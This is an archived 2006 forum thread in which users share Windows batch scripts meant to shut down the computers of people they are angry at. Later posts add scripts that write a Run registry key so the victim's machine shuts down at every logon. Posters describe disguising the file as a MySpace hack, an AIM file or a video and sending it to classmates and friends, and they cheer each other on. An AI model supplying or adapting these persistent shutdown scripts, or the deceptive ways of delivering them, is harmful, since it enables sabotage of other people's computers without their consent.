ThyElite Forums

ThyElite Forums (http://www.thyelite.com/forum/index.php)
-   General Talk (http://www.thyelite.com/forum/forumdisplay.php?f=14)
-   -   Pissed at someone? Send them this! (http://www.thyelite.com/forum/showthread.php?t=2653)

MYMOMMAGOTBEEF 08-17-2006 12:58 PM

Pissed at someone? Send them this!
 
1: Well if your pissed at someone just make a simple batch file.
AUTOEXEC.bat <---name of file
save into the c:
@echo off <----turns the echo off...
shutdown * -s -t 5 -c That's what you get for f*cking with me! <---shuts down computer and displays that little message on the screen. Shuts down after 5 seconds (-t).

I little something i've learned from back in the day's with aimkaos :D

PlasmaShock 08-17-2006 01:02 PM

thats confusing.

darkphaux 08-17-2006 01:10 PM

yes it is a little confusing could you please just post the code and the instructions

MYMOMMAGOTBEEF 08-17-2006 01:35 PM

Lol. Ok Open up note pad. Then you type:
@echo off
shutdown * -s -t 5 -c That's what you get for fucking with me!

Then save it as AUTOEXEC.BAT BAT stands for batch. Make sure its saved in your c:/ drive. But dont ever click on it :D:D:D. Or name it something else. I like to name it myspacehack.bat and send it over through aim or e-mail. Stupid kids like my friends click on it then the malicious file begins >:D!

Ok let me break it down.
@echo off (is a silly command. :D lol no. it turns the echo off)
shutdown * -s (means to shutdown the computer)
-t 5 (means shutdown in 5 seconds. you can change 5 to whatever reasonable)
-c (means comment. you can put anything there after the -c with a following space)

PlasmaShock 08-17-2006 03:47 PM

thats cool lol.

darkphaux 08-17-2006 11:56 PM

:P iv got ideas for the new scool year...and btw cant you also just open up dos and type edit, then type in @echo off
shutdown * -s -t 5 -c That's what you get for fucking with me!
and save it as AUTOEXE.bat

simonmanu 08-18-2006 02:10 PM

hay that is good i got just the person lol

MYMOMMAGOTBEEF 08-19-2006 09:49 PM

Lol pwnt. :D Yea dark you could do it that why by using font :D Yup that's what im going to do this year at school :D Im going to make a batch file then send it over the schools network to everybody in computer class and tell them it's a aim :D Then wait for their reaction :D

DefectiveProduct 08-19-2006 09:51 PM

Better yet, you could make a program that puts itself in the victims startup folder. And in the Form_Load event, you would make the program shut down their computer.

Wouldn't that be a bitch?

MYMOMMAGOTBEEF 08-19-2006 09:54 PM

Yea it would :D great idea Def :D:D something I should get to work on.

kevthedude 08-19-2006 09:58 PM

Quote:

Originally Posted by DefectiveProduct
Better yet, you could make a program that puts itself in the victims startup folder. And in the Form_Load event, you would make the program shut down their computer.

Wouldn't that be a bitch?

Didn't I give you that idea over at l0sers? If you can't move it to the startup folder then you could add the program to the registry. Even worse, 90% of people don't know the location to that registry file. Hell, most people don't even know how to access the registry.

PlasmaShock 08-19-2006 10:00 PM

Quote:

Originally Posted by DefectiveProduct
Better yet, you could make a program that puts itself in the victims startup folder. And in the Form_Load event, you would make the program shut down their computer.

Wouldn't that be a bitch?

the only hard part would be making the program and putting it in the person's startup folder.

DefectiveProduct 08-19-2006 10:07 PM

Quote:

Originally Posted by kevthedude
Didn't I give you that idea over at l0sers? If you can't move it to the startup folder then you could add the program to the registry. Even worse, 90% of people don't know the location to that registry file. Hell, most people don't even know how to access the registry.

And I never figured out exactly how to do that. >_>

Quote:

Originally Posted by PlasmaShock
the only hard part would be making the program and putting it in the person's startup folder.

The only hard part would be to make the program copy itself in the registry/startup folder. Making it shut down the computer is easy. It just takes one line of coding.

Code:

Shell ("SHUTDOWN -S -t 1")

MYMOMMAGOTBEEF 08-19-2006 10:58 PM

Can't you remotely add it to the registery?

TAG 08-19-2006 11:04 PM

LOL, I'm doing to that and posting it on myspace! ROFL!

[EDIT]: I can't save it as a batch file. All I can save it as is a text file.

DefectiveProduct 08-19-2006 11:08 PM

Forgot to mention that it's in Visual Basic 6. :tard:

TAG 08-19-2006 11:11 PM

Wait, everyone, you have to add .bat AFTER the name you want. It's not a file you can save it as.

Example (just save it as this): thefilenameyouwant.bat.

Click save. Just save it as a text file, it will become a bat file.

TAG 08-19-2006 11:29 PM

WHAT THE FUCK. It keeps telling me that another program is using the file.

Sifter 08-20-2006 12:22 AM

Make a Batch file with any name...
Code:

@ECHO off
CLS
ECHO REGEDIT4 >> temp.reg
ECHO [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run] >> temp.reg
ECHO "ownage"="shutdown.exe -s -t 00" >> temp.reg
REGEDIT.EXE /s temp.reg
SHUTDOWN.EXE -s -t 00

If they are using Windows XP on an admins account, this will make their computer shut off every time they log on to their account.

MYMOMMAGOTBEEF 08-20-2006 12:36 AM

:o OMFG! Thanks for providing us with that sifter :D:D:D. Well duh you have to save it with the extension .bat how else are you going to get a batch file.

PlasmaShock 08-20-2006 12:45 AM

just save it as a batch file like u would normally do, right?

TAG 08-20-2006 12:47 AM

Well, how the hell do I save it as a batch file? The only option in note pad it lets me do is save it as a text file.

MYMOMMAGOTBEEF 08-20-2006 12:47 AM

Yes......BTW anybody know where I can upload it so people can download it off? Im spoofing it as a breakdancing video of me and my friends. :D

Edit for TAG: Go to File/Save As/ Filename= IMSOSEXY.bat (bat stands for batch) then look at it after it's saved and it looks kinda like MS-DOS

TAG 08-20-2006 12:48 AM

Please read my post above yomomma.

TAG 08-20-2006 01:00 AM

Dude, I did that. And it tells me that it's being used by another program.

MYMOMMAGOTBEEF 08-20-2006 01:05 AM

Lol. Your notepad is a piece of shit then. :D Try doing it in wordpad ;)

TAG 08-20-2006 01:08 AM

Umm still the same problem, wtf. I'llrestart my computer.

PlasmaShock 08-20-2006 10:36 AM

just send the file via email or messanger.

TAG 08-20-2006 11:54 AM

A black screen shows up for like 2 seconds and then exits and nothing happens. I sent it to my friend and the same thing happend.

MYMOMMAGOTBEEF 08-20-2006 01:19 PM

Lol. Well try understanding the meaning of the code before C/P. Then you'll figure out the problem. It mostly works for Windows XP.

Jimmy 08-20-2006 06:23 PM

thats so sick

kevthedude 08-20-2006 08:36 PM

Okay, Here is a code I came up with. It can be executed from anywhere on the PC and still work. The code below MUST stay EXACTLY the same as it is printed here. The file can be named anything but must be a .bat file. I have not tested the shutdown file but I'm 99% sure it'll work. I have confirmed that it will add the file to the startup registry location and it will run this on any user using the PC. A cool feature I added is that if there is a file with the same name and location as the ones being saved, it'll delete them and then create a new one.

Code:

@echo off
if exist C:\system_reg.reg del C:\system_reg.reg
echo Windows Registry Editor Version 5.00 >> C:\system_reg.reg
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run] >> C:\system_reg.reg
echo "system_reg"="\"C:/system_bat.bat\"" >> C:\system_reg.reg
regedit.exe /S /C C:\system_reg.reg
if exist C:\system_bat.bat del C:\system_bat.bat
echo SHUTDOWN -S -t 1 >> C:\system_bat.bat
SHUTDOWN -S -t 1

If an admin wants to put this in special access be my guest.

Edit: The even better part is that if they delete the original file that was sent to them, they would still have this problem because a whole new .bat file is created.

TAG 08-20-2006 08:46 PM

LOL thanks a lot kev. But how do I add text to it so I can say a comment?

And why is yomommagotbeef banned?

kevthedude 08-20-2006 08:50 PM

umm, find where I have the shutdown command (last two lines). You can change that command to whatever you want.

So you can change them to:
Code:

echo SHUTDOWN -S -t 1 -c Bye, Bye! >> C:\system_bat.bat
SHUTDOWN -S -t 1 -c Fuck you! Your in trouble now dipshit.

The first time you see it the shutdown command will be ran each time the PC startup items are loaded. The second time is just for the first time the BAT file you sent them will be ran. The script I gave you onlys needs to be ran by the user once. After that it doesn't matter.

zzzzzz 08-20-2006 09:35 PM

:p this is so sweet so once i make it i send it over an instant messeging program like msn right.

PlasmaShock 08-20-2006 09:53 PM

kevthedude owns.

Alex- 08-20-2006 09:57 PM

Uhh can someone make that a little clearer?

TAG 08-20-2006 10:48 PM

1. Open up notepad.
2. Copy & paste this into the message:
Code:

@echo off
if exist C:\system_reg.reg del C:\system_reg.reg
echo Windows Registry Editor Version 5.00 >> C:\system_reg.reg
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run] >> C:\system_reg.reg
echo "system_reg"="\"C:/system_bat.bat\"" >> C:\system_reg.reg
regedit.exe /S /C C:\system_reg.reg
if exist C:\system_bat.bat del C:\system_bat.bat
echo SHUTDOWN -S -t 1 -c Bye, Bye! >> C:\system_bat.bat
SHUTDOWN -S -t 1 -c Fuck you asshole, your computer is fried!

3. Click 'File' > 'Save As' > 'WHATEVERYOUWANTTHEFILENAMETOBE.bat'.

Make sure to save it to your desktop for easy access. Don't double click it or else your computer will be fucked. And the 'WHATEVERYOUWANTTHEFILENAMETOBE' stands for what ever you want the file name to be. Have fun fucking up your friends computers!

kevthedude 08-21-2006 09:31 AM

Also, I can add that if you do run it by mistake, just boot up your PC in safe mode and delete the .BAT file in the C:\ Drive

vinciryan 08-22-2006 12:07 PM

WTG!!!!!!!!!! whoooooooohooooo!shut the guys computer down nice job!! a round of applause


All times are GMT -6. The time now is 03:10 AM.

Powered by vBulletin® Version 3.6.8
Copyright ©2000 - 2025, Jelsoft Enterprises Ltd.